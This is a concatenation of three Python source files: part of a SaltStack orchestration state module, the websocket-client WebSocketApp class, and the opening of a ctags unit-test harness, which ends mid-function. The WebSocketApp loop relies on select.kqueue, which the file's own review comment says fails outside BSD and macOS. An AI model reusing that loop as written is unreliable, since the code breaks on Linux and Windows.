    sevent = salt.utils.event.get_event(
        node,
        __opts__['sock_dir'],
        __opts__['transport'],
        opts=__opts__,
        listen=True)
    # (removed an unused 'del_counter' that was incremented but never read)
    starttime = time.time()
    timelimit = starttime + timeout
    while True:
        event = sevent.get_event(full=True)
        is_timedout = time.time() > timelimit
        # get_event returns None when its internal wait expires; keep looping
        # until data arrives or the overall time limit passes.
        if event is None and not is_timedout:
            log.trace("wait_for_event: No event data; waiting.")
            continue
        elif event is None and is_timedout:
            ret['comment'] = 'Timeout value reached.'
            return ret
        if fnmatch.fnmatch(event['tag'], name):
            val = event['data'].get(event_id)
            # Some events nest their payload under a 'data' sub-key
            # (e.g. events forwarded from minions); look there too.
            if val is None and 'data' in event['data']:
                val = event['data']['data'].get(event_id)
            if val is not None:
                try:
                    val_idx = id_list.index(val)
                except ValueError:
                    log.trace("wait_for_event: Event identifier '%s' not in "
                              "id_list; skipping.", event_id)
                else:
                    del id_list[val_idx]
                    minions_seen = ret['changes'].setdefault('minions_seen', [])
                    minions_seen.append(val)
                    log.debug("wait_for_event: Event identifier '%s' removed "
                              "from id_list; %s items remaining.",
                              val, len(id_list))
            else:
                log.trace("wait_for_event: Event identifier '%s' not in event "
                          "'%s'; skipping.", event_id, event['tag'])
        else:
            log.debug("wait_for_event: Skipping unmatched event '%s'",
                      event['tag'])
        if len(id_list) == 0:
            ret['result'] = True
            ret['comment'] = 'All events seen in {0} seconds.'.format(
                time.time() - starttime)
            return ret
        if is_timedout:
            ret['comment'] = 'Timeout value reached.'
            return ret
def runner(name, **kwargs):
    '''
    Execute a runner module on the master

    .. versionadded:: 2014.7.0

    name
        The name of the function to run

    kwargs
        Any keyword arguments to pass to the runner function

    .. code-block:: yaml

        run-manage-up:
          salt.runner:
            - name: manage.up
    '''
    # __orchestration_jid__ only exists when invoked by the orchestrate
    # runner; fall back to None outside orchestration.
    try:
        jid = __orchestration_jid__
    except NameError:
        log.debug(
            'Unable to fire args event due to missing __orchestration_jid__'
        )
        jid = None
    if __opts__.get('test', False):
        return {
            'name': name,
            'result': None,
            'changes': {},
            'comment': "Runner function '{0}' would be executed.".format(name)
        }
    out = __salt__['saltutil.runner'](name,
                                      __orchestration_jid__=jid,
                                      __env__=__env__,
                                      full_return=True,
                                      **kwargs)
    runner_return = out.get('return')
    # A dict return containing 'Error' signals a failed runner.
    if isinstance(runner_return, dict) and 'Error' in runner_return:
        out['success'] = False
    success = out.get('success', True)
    ret = {
        'name': name,
        'changes': {'return': runner_return},
        'result': success,
        'comment': "Runner function '{0}' {1}.".format(
            name,
            'executed' if success else 'failed',
        ),
        '__orchestration__': True,
    }
    if 'jid' in out:
        ret['__jid__'] = out['jid']
    return ret
def parallel_runners(name, runners):
    '''
    Executes multiple runner modules on the master in parallel.

    .. versionadded:: 2017.x.0 (Nitrogen)

    A separate thread is spawned for each runner. This state is intended to be
    used with the orchestrate runner in place of the ``saltmod.runner`` state
    when different tasks should be run in parallel. In general, Salt states are
    not safe when used concurrently, so ensure that they are used in a safe way
    (e.g. by only targeting separate minions in parallel tasks).

    name:
        name identifying this state. The name is provided as part of the
        output, but not used for anything else.

    runners:
        list of runners that should be run in parallel. Each element of the
        list has to be a dictionary. This dictionary's name entry stores the
        name of the runner function that shall be invoked. The optional kwarg
        entry stores a dictionary of named arguments that are passed to the
        runner function.

    .. code-block:: yaml

        parallel-state:
          salt.parallel_runners:
            - runners:
                my_runner_1:
                  - name: state.orchestrate
                  - kwarg:
                      mods: orchestrate_state_1
                my_runner_2:
                  - name: state.orchestrate
                  - kwarg:
                      mods: orchestrate_state_2
    '''
    # For the sake of consistency, we treat a single string in the same way as
    # a key without a value. This allows something like
    # salt.parallel_runners:
    #   - runners:
    #       state.orchestrate
    # Obviously, this will only work if the specified runner does not need any
    # arguments.
    if isinstance(runners, six.string_types):
        runners = {runners: [{name: runners}]}
    # If the runners argument is not a string, it must be a dict. Everything
    # else is considered an error.
    if not isinstance(runners, dict):
        return {
            'name': name,
            'result': False,
            'changes': {},
            'comment': 'The runners parameter must be a string or dict.'
        }
    # The configuration for each runner is given as a list of key-value pairs.
    # This is not very useful for what we want to do, but it is the typical
    # style used in Salt. For further processing, we convert each of these
    # lists to a dict. This also makes it easier to check whether a name has
    # been specified explicitly.
    # NOTE(review): this assigns existing keys of 'runners' while iterating
    # it; safe because the key set never changes, only the values.
    for runner_id, runner_config in six.iteritems(runners):
        if runner_config is None:
            runner_config = {}
        else:
            runner_config = salt.utils.data.repack_dictlist(runner_config)
        if 'name' not in runner_config:
            runner_config['name'] = runner_id
        runners[runner_id] = runner_config
    # __orchestration_jid__ only exists when invoked by the orchestrate
    # runner; fall back to None outside orchestration.
    try:
        jid = __orchestration_jid__
    except NameError:
        log.debug(
            'Unable to fire args event due to missing __orchestration_jid__')
        jid = None

    def call_runner(runner_config):
        # Worker body executed by _parallel_map in a separate thread per runner.
        return __salt__['saltutil.runner'](runner_config['name'],
                                           __orchestration_jid__=jid,
                                           __env__=__env__,
                                           full_return=True,
                                           **(runner_config.get('kwarg', {})))
    try:
        outputs = _parallel_map(call_runner, list(six.itervalues(runners)))
    except salt.exceptions.SaltException as exc:
        return {
            'name': name,
            'result': False,
            'success': False,
            'changes': {},
            'comment': 'One of the runners raised an exception: {0}'.format(
                exc)
        }
    # We bundle the results of the runners with the IDs of the runners so that
    # we can easily identify which output belongs to which runner. At the same
    # time we extract the actual return value of the runner (saltutil.runner
    # adds some extra information that is not interesting to us).
    outputs = {
        runner_id: out['return'] for runner_id, out in
        six.moves.zip(six.iterkeys(runners), outputs)
    }
    # If each of the runners returned its output in the format compatible with
    # the 'highstate' outputter, we can leverage this fact when merging the
    # outputs.
    highstate_output = all(
        [out.get('outputter', '') == 'highstate' and 'data' in out for out in
         six.itervalues(outputs)]
    )

    # The following helper function is used to extract changes from highstate
    # output.
    def extract_changes(obj):
        if not isinstance(obj, dict):
            return {}
        elif 'changes' in obj:
            if (isinstance(obj['changes'], dict)
                    and obj['changes'].get('out', '') == 'highstate'
                    and 'ret' in obj['changes']):
                return obj['changes']['ret']
            else:
                return obj['changes']
        else:
            # Recurse into nested dicts and collect any changes found below.
            found_changes = {}
            for key, value in six.iteritems(obj):
                change = extract_changes(value)
                if change:
                    found_changes[key] = change
            return found_changes
    if highstate_output:
        failed_runners = [runner_id for runner_id, out in
                          six.iteritems(outputs) if
                          out['data'].get('retcode', 0) != 0]
        all_successful = not failed_runners
        if all_successful:
            comment = 'All runner functions executed successfully.'
        else:
            runner_comments = [
                'Runner {0} failed with return value:\n{1}'.format(
                    runner_id,
                    salt.output.out_format(outputs[runner_id],
                                           'nested',
                                           __opts__,
                                           nested_indent=2)
                ) for runner_id in failed_runners
            ]
            comment = '\n'.join(runner_comments)
        changes = {}
        for runner_id, out in six.iteritems(outputs):
            runner_changes = extract_changes(out['data'])
            if runner_changes:
                changes[runner_id] = runner_changes
    else:
        # Non-highstate output: fall back to per-runner exit codes and
        # report the raw outputs as changes.
        failed_runners = [runner_id for runner_id, out in
                          six.iteritems(outputs) if
                          out.get('exit_code', 0) != 0]
        all_successful = not failed_runners
        if all_successful:
            comment = 'All runner functions executed successfully.'
        else:
            if len(failed_runners) == 1:
                comment = 'Runner {0} failed.'.format(failed_runners[0])
            else:
                comment = \
                    'Runners {0} failed.'.format(', '.join(failed_runners))
        changes = {'ret': {
            runner_id: out for runner_id, out in six.iteritems(outputs)
        }}
    ret = {
        'name': name,
        'result': all_successful,
        'changes': changes,
        'comment': comment
    }
    # The 'runner' function includes out['jid'] as '__jid__' in the returned
    # dict, but we cannot do this here because we have more than one JID if
    # we have more than one runner.
    return ret
def wheel(name, **kwargs):
    '''
    Execute a wheel module on the master

    .. versionadded:: 2014.7.0

    name
        The name of the function to run

    kwargs
        Any keyword arguments to pass to the wheel function

    .. code-block:: yaml

        accept_minion_key:
          salt.wheel:
            - name: key.accept
            - match: frank
    '''
    ret = {'name': name, 'result': False, 'changes': {}, 'comment': ''}
    # __orchestration_jid__ only exists when invoked by the orchestrate
    # runner; fall back to None outside orchestration.
    try:
        jid = __orchestration_jid__
    except NameError:
        log.debug(
            'Unable to fire args event due to missing __orchestration_jid__'
        )
        jid = None
    if __opts__.get('test', False):
        # BUGFIX: a trailing comma previously made this the one-element
        # tuple (None,), which is truthy and broke test-mode reporting.
        ret['result'] = None
        ret['changes'] = {}
        ret['comment'] = "Wheel function '{0}' would be executed.".format(name)
        return ret
    out = __salt__['saltutil.wheel'](name,
                                     __orchestration_jid__=jid,
                                     __env__=__env__,
                                     **kwargs)
    wheel_return = out.get('return')
    # A dict return containing 'Error' signals a failed wheel call.
    if isinstance(wheel_return, dict) and 'Error' in wheel_return:
        out['success'] = False
    success = out.get('success', True)
    ret = {'name': name,
           'changes': {'return': wheel_return},
           'result': success}
    ret['comment'] = "Wheel function '{0}' {1}.".format(
        name,
        'executed' if success else 'failed',
    )
    ret['__orchestration__'] = True
    if 'jid' in out:
        ret['__jid__'] = out['jid']
    return ret
|
_app.py | """
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
"""
WebSocketApp provides higher level APIs.
"""
import threading
import time
import traceback
import sys
import select
import six
from ._core import WebSocket, getdefaulttimeout
from ._exceptions import *
from ._logging import *
from websocket._abnf import ABNF
__all__ = ["WebSocketApp"]
class WebSocketApp(object):
    """
    Higher level of APIs are provided.
    The interface is like JavaScript WebSocket object.
    """
    def __init__(self, url, header=None,
                 on_open=None, on_message=None, on_error=None,
                 on_close=None, on_ping=None, on_pong=None,
                 on_cont_message=None,
                 keep_running=True, get_mask_key=None, cookie=None,
                 subprotocols=None):
        """
        url: websocket url.
        header: custom header for websocket handshake (list; default empty).
        on_open: callable object which is called at opening websocket.
          this function has one argument. The argument is this class object.
        on_message: callable object which is called when received data.
          on_message has 2 arguments.
          The 1st argument is this class object.
          The passing 2nd argument is utf-8 string which we get from the server.
        on_error: callable object which is called when we get error.
          on_error has 2 arguments.
          The 1st argument is this class object.
          The passing 2nd argument is exception object.
        on_close: callable object which is called when closed the connection.
          this function has one argument. The argument is this class object.
        on_ping/on_pong: callables invoked on ping/pong frames (this object
          and the frame payload).
        on_cont_message: callback object which is called when receive continued
          frame data.
          on_cont_message has 3 arguments.
          The 1st argument is this class object.
          The passing 2nd argument is utf-8 string which we get from the server.
          The 3rd argument is continue flag. if 0, the data continue
          to next frame data
        keep_running: a boolean flag indicating whether the app's main loop
          should keep running, defaults to True
        get_mask_key: a callable to produce new mask keys,
          see the WebSocket.set_mask_key's docstring for more information
        cookie: cookie value sent with the handshake.
        subprotocols: array of available sub protocols. default is None.
        """
        self.url = url
        # 'header=[]' as a default argument would be one list shared by
        # every instance (the classic mutable-default pitfall); normalize
        # None to a fresh list here instead.
        self.header = header if header is not None else []
        self.cookie = cookie
        self.on_open = on_open
        self.on_message = on_message
        self.on_error = on_error
        self.on_close = on_close
        self.on_ping = on_ping
        self.on_pong = on_pong
        self.on_cont_message = on_cont_message
        self.keep_running = keep_running
        self.get_mask_key = get_mask_key
        self.sock = None
        self.last_ping_tm = 0
        self.subprotocols = subprotocols

    def send(self, data, opcode=ABNF.OPCODE_TEXT):
        """
        send message.
        data: message to send. If you set opcode to OPCODE_TEXT,
              data must be utf-8 string or unicode.
        opcode: operation code of data. default is OPCODE_TEXT.
        """
        if not self.sock or self.sock.send(data, opcode) == 0:
            raise WebSocketConnectionClosedException("Connection is already closed.")

    def close(self):
        """
        close websocket connection.
        """
        self.keep_running = False
        if self.sock:
            self.sock.close()

    def _send_ping(self, interval, event):
        # Runs on a background thread: ping every `interval` seconds until
        # `event` is set by run_forever's cleanup.
        while not event.wait(interval):
            self.last_ping_tm = time.time()
            if self.sock:
                self.sock.ping()

    def run_forever(self, sockopt=None, sslopt=None,
                    ping_interval=0, ping_timeout=None,
                    http_proxy_host=None, http_proxy_port=None,
                    http_no_proxy=None, http_proxy_auth=None,
                    skip_utf8_validation=False):
        """
        run event loop for WebSocket framework.
        This loop is infinite loop and is alive during websocket is available.
        sockopt: values for socket.setsockopt.
            sockopt must be tuple
            and each element is argument of sock.setsockopt.
        sslopt: ssl socket optional dict.
        ping_interval: automatically send "ping" command
            every specified period(second)
            if set to 0, not send automatically.
        ping_timeout: timeout(second) if the pong message is not received.
        http_proxy_host: http proxy host name.
        http_proxy_port: http proxy port. If not set, set to 80.
        http_no_proxy: host names, which doesn't use proxy.
        skip_utf8_validation: skip utf8 validation.
        """
        if not ping_timeout or ping_timeout <= 0:
            ping_timeout = None
        if sockopt is None:
            sockopt = []
        if sslopt is None:
            sslopt = {}
        if self.sock:
            raise WebSocketException("socket is already opened")
        thread = None
        event = None
        close_frame = None
        kq = None
        try:
            self.sock = WebSocket(self.get_mask_key,
                                  sockopt=sockopt, sslopt=sslopt,
                                  fire_cont_frame=self.on_cont_message and True or False,
                                  skip_utf8_validation=skip_utf8_validation)
            self.sock.settimeout(getdefaulttimeout())
            # NOTE(review): select.kqueue exists only on BSD/macOS; on
            # Linux/Windows this raises AttributeError.  Confirm the target
            # platform or fall back to select.select there.
            kq = select.kqueue()
            self.sock.connect(self.url, header=self.header, cookie=self.cookie,
                              http_proxy_host=http_proxy_host,
                              http_proxy_port=http_proxy_port,
                              http_no_proxy=http_no_proxy, http_proxy_auth=http_proxy_auth,
                              subprotocols=self.subprotocols)
            # Watch the connected socket for readability.
            kevent = select.kevent(self.sock.sock,
                                   filter=select.KQ_FILTER_READ,
                                   flags=select.KQ_EV_ADD | select.KQ_EV_ENABLE)
            self._callback(self.on_open)
            if ping_interval:
                event = threading.Event()
                thread = threading.Thread(target=self._send_ping,
                                          args=(ping_interval, event))
                # .daemon replaces the deprecated setDaemon()
                thread.daemon = True
                thread.start()
            while self.sock.connected:
                revents = kq.control([kevent], 1, None)
                if not self.keep_running:
                    break
                if ping_timeout and self.last_ping_tm \
                        and time.time() - self.last_ping_tm > ping_timeout:
                    self.last_ping_tm = 0
                    raise WebSocketTimeoutException("ping timed out")
                for ev in revents:
                    if ev.filter == select.KQ_FILTER_READ:
                        op_code, frame = self.sock.recv_data_frame(True)
                        if op_code == ABNF.OPCODE_CLOSE:
                            close_frame = frame
                            break
                        elif op_code == ABNF.OPCODE_PING:
                            self._callback(self.on_ping, frame.data)
                        elif op_code == ABNF.OPCODE_PONG:
                            self._callback(self.on_pong, frame.data)
                        elif op_code == ABNF.OPCODE_CONT and self.on_cont_message:
                            self._callback(self.on_cont_message,
                                           frame.data, frame.fin)
                        else:
                            data = frame.data
                            if six.PY3 and frame.opcode == ABNF.OPCODE_TEXT:
                                data = data.decode("utf-8")
                            self._callback(self.on_message, data)
                if close_frame:
                    # The 'break' above only leaves the inner for-loop;
                    # without this the outer loop kept waiting on kqueue
                    # after the peer had already sent a close frame.
                    break
        except Exception as e:
            self._callback(self.on_error, e)
        finally:
            if thread and event:
                event.set()
                thread.join()
            self.keep_running = False
            if kq is not None:
                # release the kqueue file descriptor
                kq.close()
            if self.sock:
                # guard: self.sock is still None when WebSocket() itself
                # raised, and calling close() on None would mask the error
                self.sock.close()
            self._callback(self.on_close,
                           *self._get_close_args(close_frame.data if close_frame else None))
            self.sock = None

    def _get_close_args(self, data):
        """ this functions extracts the code, reason from the close body
        if they exists, and if the self.on_close except three arguments """
        import inspect
        # if the on_close callback is "old" (not 3-arg), just return empty list
        if not self.on_close:
            return []
        # inspect.getargspec was removed in Python 3.11; prefer
        # getfullargspec when it exists, keep getargspec for old runtimes.
        getspec = getattr(inspect, 'getfullargspec', None) or inspect.getargspec
        if len(getspec(self.on_close).args) != 3:
            return []
        if data and len(data) >= 2:
            code = 256 * six.byte2int(data[0:1]) + six.byte2int(data[1:2])
            reason = data[2:].decode('utf-8')
            return [code, reason]
        return [None, None]

    def _callback(self, callback, *args):
        # Invoke a user callback defensively: a callback error must not
        # kill the event loop, so it is logged instead of propagated.
        if callback:
            try:
                callback(self, *args)
            except Exception as e:
                error(e)
                if isEnableForDebug():
                    _, _, tb = sys.exc_info()
                    traceback.print_tb(tb)
|
units.py | #!/usr/bin/env python3
#
# units.py - Units test harness for ctags
#
# Copyright (C) 2019 Ken Takata
# (Based on "units" written by Masatake YAMATO.)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Python 3.5 or later is required.
# On Windows, unix-like shell (e.g. bash) and some unix tools (sed,
# diff, etc.) are needed.
#
import time # for debugging
import argparse
import filecmp
import glob
import io
import os
import platform
import queue
import re
import shutil
import stat
import subprocess
import sys
import threading
#
# Global Parameters
#
# Overridden from command-line options in the action handlers below.
SHELL = '/bin/sh'            # shell used to run external filter pipelines
CTAGS = './ctags'            # ctags binary under test
READTAGS = './readtags'
OPTSCRIPT = './optscript'
WITH_TIMEOUT = 0             # per-case timeout in seconds (0 = no timeout)
WITH_VALGRIND = False        # run each case under valgrind
COLORIZED_OUTPUT = True      # colorize pass/fail/skip markers
CATEGORIES = []              # run only these categories (empty = all)
UNITS = []                   # run only these units (empty = all)
LANGUAGES = []               # run only cases for these parsers (empty = all)
PRETENSE_OPTS = ''           # --_pretend-* options built by make_pretense_map
RUN_SHRINK = False           # shrink failing inputs via the shell harness
SHOW_DIFF_OUTPUT = False     # include diff/stderr details in the summary
NUM_WORKER_THREADS = 4       # size of the test-case worker pool
DIFF_U_NUM = 0               # context lines passed to 'diff -U'
#
# Internal variables and constants
#
_FEATURE_LIST = []           # features of the ctags binary (set by init_features)
_PREPERE_ENV = ''            # NOTE: "PREPERE" (sic); env prefix written to CMDLINE.tmp
_DEFAULT_CATEGORY = 'ROOT'   # category name for units directly under Units/
_TIMEOUT_EXIT = 124          # presumably the timeout wrapper's exit status - TODO confirm
_VG_TIMEOUT_FACTOR = 10      # valgrind runs get 10x the configured timeout
_VALGRIND_EXIT = 58          # passed to valgrind --error-exitcode
_STDERR_OUTPUT_NAME = 'STDERR.tmp'    # saved stderr of a test run
_DIFF_OUTPUT_NAME = 'DIFF.tmp'        # saved diff of expected vs. actual
_VALGRIND_OUTPUT_NAME = 'VALGRIND.tmp'  # saved valgrind log
#
# Results
#
# Each list accumulates 'category/name' strings for one outcome class.
L_PASSED = []
L_FIXED = []
L_FAILED_BY_STATUS = []
L_FAILED_BY_DIFF = []
L_SKIPPED_BY_FEATURES = []
L_SKIPPED_BY_LANGUAGES = []
L_SKIPPED_BY_ILOOP = []
L_KNOWN_BUGS = []
L_FAILED_BY_TIMEED_OUT = []  # NOTE: "TIMEED" (sic); referenced elsewhere, keep the name
L_BROKEN_ARGS_CTAGS = []
L_VALGRIND = []
TMAIN_STATUS = True
TMAIN_FAILED = []
def remove_prefix(string, prefix):
    """Return *string* with a leading *prefix* stripped, if present."""
    return string[len(prefix):] if string.startswith(prefix) else string
def is_cygwin():
    """Return True when running under a Cygwin or MinGW32 Python."""
    sysname = platform.system()
    return any(sysname.startswith(p) for p in ('CYGWIN_NT', 'MINGW32_NT'))
def isabs(path):
    """Absolute-path test that also accepts native NT paths on Cygwin/MinGW."""
    if is_cygwin():
        import ntpath
        # a DOS-style absolute path counts even though POSIX says otherwise
        return True if ntpath.isabs(path) else os.path.isabs(path)
    return os.path.isabs(path)
def action_help(parser, action, *args):
    """'help' action entry point: print usage and report success."""
    parser.print_help()
    return 0
def error_exit(status, msg):
    """Report *msg* on stderr, then terminate with exit code *status*."""
    print(msg, file=sys.stderr)
    sys.exit(status)
def line(*args, file=sys.stdout):
    """Draw a 60-column separator; an optional first arg picks the character."""
    ch = args[0] if args else '-'
    print(ch * 60, file=file)
def remove_readonly(func, path, _):
    """shutil.rmtree error hook: clear read-only bits on *path* and its
    directory, then retry the failed operation."""
    os.chmod(path, stat.S_IWRITE | stat.S_IREAD)
    parent = os.path.dirname(path)
    os.chmod(parent, os.stat(parent).st_mode | stat.S_IWRITE)
    func(path)
def clean_bundles(bundles):
    """Delete every path listed in the *bundles* manifest, then the manifest
    itself.  A missing manifest is a no-op."""
    if not os.path.isfile(bundles):
        return
    with open(bundles, 'r') as manifest:
        entries = manifest.read().splitlines()
    for entry in entries:
        if os.path.isdir(entry):
            shutil.rmtree(entry, onerror=remove_readonly)
        elif os.path.isfile(entry):
            os.remove(entry)
    os.remove(bundles)
def clean_tcase(d, bundles):
    """Remove bundle files plus *.tmp/*.TMP leftovers from test dir *d*."""
    if not os.path.isdir(d):
        return
    clean_bundles(bundles)
    for pattern in ('/*.tmp', '/*.TMP'):
        for leftover in glob.glob(d + pattern):
            os.remove(leftover)
def check_availability(cmd):
    """Abort the harness unless *cmd* can be found on PATH."""
    if shutil.which(cmd) is None:
        error_exit(1, cmd + ' command is not available')
def check_units(name, category):
    """Return True when unit *name* in *category* is selected by --units.

    An empty UNITS list selects everything; entries are either bare unit
    names or 'category/name' pairs.
    """
    if not UNITS:
        return True
    for selector in UNITS:
        matched = re.match(r'(.+)/(.+)', selector)
        if matched:
            if matched.group(1, 2) == (category, name):
                return True
        elif selector == name:
            return True
    return False
def init_features():
    """Populate _FEATURE_LIST by querying the ctags binary under test."""
    global _FEATURE_LIST
    cmd = [CTAGS, '--quiet', '--options=NONE', '--list-features', '--with-list=no']
    proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    listing = proc.stdout.decode('utf-8')
    # keep only the first (feature-name) column of every row
    _FEATURE_LIST = re.sub(r'(?m)^([^ ]+).*$', r'\1', listing).splitlines()
def check_features(feature, ffile):
    """Check the feature requirements of a test case.

    feature: a single requirement (possibly '!'-prefixed), or a falsy
        value to read requirements from the *ffile* 'features' file.
    ffile: path of a file listing one requirement per line.

    A plain requirement demands the feature be present in _FEATURE_LIST;
    a '!'-prefixed one demands it be absent.  Returns (True, '') when all
    requirements hold, otherwise (False, <requirement>) for the first
    failing one.
    """
    features = []
    if feature:
        features = [feature]
    elif os.path.isfile(ffile):
        with open(ffile, 'r') as f:
            features = f.read().splitlines()
    for expected in features:
        if expected == '':
            continue
        if expected[0] == '!':
            # Negated requirement: fail only when the unwanted feature IS
            # available (matches the caller's "unwanted feature ... is
            # available" skip message).  The previous code fell through to
            # a generic not-found failure, so a '!'-requirement whose
            # feature was absent could never pass.
            if expected[1:] in _FEATURE_LIST:
                return (False, expected)
        elif expected not in _FEATURE_LIST:
            return (False, expected)
    return (True, '')
def check_languages(cmdline, lfile):
    """Verify every parser listed in *lfile* is known to ctags.

    Returns (True, '') when *lfile* is missing or all parsers are
    available; otherwise (False, <parser>) for the first missing one.
    """
    if not os.path.isfile(lfile):
        return (True, '')
    proc = subprocess.run(cmdline + ['--list-languages'],
                          stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    known = proc.stdout.decode('utf-8').splitlines()
    with open(lfile, 'r') as f:
        wanted = f.read().splitlines()
    for parser in wanted:
        if parser not in known:
            return (False, parser)
    return (True, '')
def decorate(decorator, msg, colorized):
    """Wrap *msg* in an ANSI color escape ('red'/'green'/'yellow') when
    *colorized* is true; otherwise return it unchanged."""
    codes = {'red': '31', 'green': '32', 'yellow': '33'}
    if decorator not in codes:
        error_exit(1, 'INTERNAL ERROR: wrong run_result function')
    if not colorized:
        return msg
    return "\x1b[" + codes[decorator] + 'm' + msg + "\x1b[m"
def run_result(result_type, msg, output, *args, file=sys.stdout):
    """Report one test outcome.

    Dispatches on *result_type* ('skip'/'error'/'ok'/'known_error'),
    printing a (possibly colorized) line to *file*; when *output* is
    given, a plain-text copy is also written into that file.
    """
    reporters = {
        'skip': run_result_skip,
        'error': run_result_error,
        'ok': run_result_ok,
        'known_error': run_result_known_error,
    }
    report = reporters[result_type]
    report(msg, file, COLORIZED_OUTPUT, *args)
    file.flush()
    if output:
        with open(output, 'w') as f:
            report(msg, f, False, *args)
def run_result_skip(msg, f, colorized, *args):
    """Print a 'skipped' line, with an optional parenthesized reason."""
    text = msg + decorate('yellow', 'skipped', colorized)
    if args:
        text += ' (' + args[0] + ')'
    print(text, file=f)
def run_result_error(msg, f, colorized, *args):
    """Print a 'failed' line, with an optional parenthesized reason."""
    text = msg + decorate('red', 'failed', colorized)
    if args:
        text += ' (' + args[0] + ')'
    print(text, file=f)
def run_result_ok(msg, f, colorized, *args):
    """Print a 'passed' line, with an optional parenthesized note."""
    text = msg + decorate('green', 'passed', colorized)
    if args:
        text += ' (' + args[0] + ')'
    print(text, file=f)
def run_result_known_error(msg, f, colorized, *args):
    """Print a 'failed (KNOWN bug)' line for expected failures."""
    print(msg + decorate('yellow', 'failed', colorized) + ' (KNOWN bug)', file=f)
def run_shrink(cmdline_template, finput, foutput, lang):
    """Shrink a failing input by delegating to the legacy shell harness."""
    script = os.path.splitext(sys.argv[0])[0]  # remove '.py'
    print('Shrinking ' + finput + ' as ' + lang)
    # fallback to the shell script version
    subprocess.run([SHELL, script, 'shrink',
                    '--timeout=1', '--foreground',
                    cmdline_template, finput, foutput])
# return a filter for normalizing the basename
#
# If internal is True, return a pair of [pattern, replacement],
# otherwise return a list of command line arguments.
def basename_filter(internal, output_type):
    """Return a filter that strips directory components from file names
    in ctags output.

    internal: True -> [regex-pattern, replacement] pair for run_filter();
        False -> a ['sed', '-e', <expr>] command line.
    output_type: one of 'ctags', 'etags', 'xref', 'json' - selects the
        expression matching that output format's layout.
    """
    # NOTE: the sed expressions below are escape-sensitive (BRE syntax,
    # embedded tabs via \t in non-raw strings); edit with care.
    filters_external = {
        'ctags': 's%\(^[^\t]\{1,\}\t\)\(/\{0,1\}\([^/\t]\{1,\}/\)*\)%\\1%',
        # "input" in the expresion is for finding input file names in the TAGS file.
        # RAWOUT.tmp:
        #
        #   ./Units/parser-ada.r/ada-etags-suffix.d/input_0.adb,238
        #   package body Input_0 is ^?Input_0/b^A1,0
        #
        # With the original expression, both "./Units/parser-ada.r/ada-etags-suffix.d/"
        # and "package body Input_0 is Input_0/' are deleted.
        # FILTERED.tmp:
        #
        #   input_0.adb,238
        #   b^A1,0
        #
        # Adding "input" ot the expression is for deleting only the former one and for
        # skpping the later one.
        #
        # FIXME: if "input" is included as a substring of tag entry names, filtering
        # with this expression makes the test fail.
        'etags': 's%.*\/\(input[-._][[:print:]]\{1,\}\),\([0-9]\{1,\}$\)%\\1,\\2%',
        'xref': 's%\(.*[[:digit:]]\{1,\} \)\([^ ]\{1,\}[^ ]\{1,\}\)/\([^ ].\{1,\}.\{1,\}$\)%\\1\\3%',
        'json': 's%\("path": \)"[^"]\{1,\}/\([^/"]\{1,\}\)"%\\1"\\2"%',
    }
    # Python-regex equivalents of the sed expressions above.
    filters_internal = {
        'ctags': [r'(^[^\t]+\t)(/?([^/\t]+/)*)', r'\1'],
        # See above comments about "input".
        'etags': [r'.*/(input[-._]\S+),([0-9]+$)', r'\1,\2'],
        'xref': [r'(.*\d+ )([^ ]+[^ ]+)/([^ ].+.+$)', r'\1\3'],
        'json': [r'("path": )"[^"]+/([^/"]+)"', r'\1"\2"'],
    }
    if internal:
        return filters_internal[output_type]
    else:
        return ['sed', '-e', filters_external[output_type]]
# convert a command line list to a command line string
def join_cmdline(cmdline):
    """Render *cmdline* as a single shell-ish string, quoting risky args."""
    def render(arg):
        # surround with '' if an argument includes spaces or '\'
        # TODO: use more robust way
        return "'" + arg + "'" if (' ' in arg or '\\' in arg) else arg
    return ' '.join(render(arg) for arg in cmdline)
def run_record_cmdline(cmdline, ffilter, ocmdline, output_type):
    """Write a reproducible 'env / ctags | basename-filter | case-filter'
    pipeline description for this test case into *ocmdline*."""
    pipeline = "%s\n%s \\\n| %s \\\n| %s\n" % (
        _PREPERE_ENV,
        join_cmdline(cmdline),
        join_cmdline(basename_filter(False, output_type)),
        ffilter)
    with open(ocmdline, 'w') as f:
        print(pipeline, file=f)
def prepare_bundles(frm, to, obundles):
    """Copy auxiliary test files from *frm* into *to*, recording every
    copy in the *obundles* manifest for later cleanup.

    Inputs, expectations, READMEs, the feature/language/filter control
    files and args.ctags are deliberately left behind.
    """
    for src in glob.glob(frm + '/*'):
        fn = os.path.basename(src)
        if fn.startswith(('input.', 'expected.tags', 'README')):
            continue
        if fn in ('features', 'languages', 'filters', 'args.ctags'):
            continue
        dist = to + '/' + fn
        if os.path.isdir(src):
            shutil.copytree(src, dist, copy_function=shutil.copyfile)
        else:
            shutil.copyfile(src, dist)
        with open(obundles, 'a') as f:
            print(dist, file=f)
def anon_normalize_sub(internal, ctags, input_actual, *args):
    """Build replacements mapping the anonhash of an actual input path to
    the anonhash of its canonical './Units/...' path.

    Returns [pattern, replacement] pairs when *internal*, otherwise sed
    '-e' arguments; recurses over any extra input paths in *args*.
    """
    def anonhash(path):
        proc = subprocess.run([CTAGS, '--quiet', '--options=NONE',
                               '--_anonhash=' + path],
                              stdout=subprocess.PIPE)
        return proc.stdout.decode('utf-8').splitlines()[0]
    # TODO: "Units" should not be hardcoded.
    input_expected = './Units' + re.sub(r'^.*?/Units', r'', input_actual, 1)
    # NOTE(review): the global CTAGS is used here, not the *ctags*
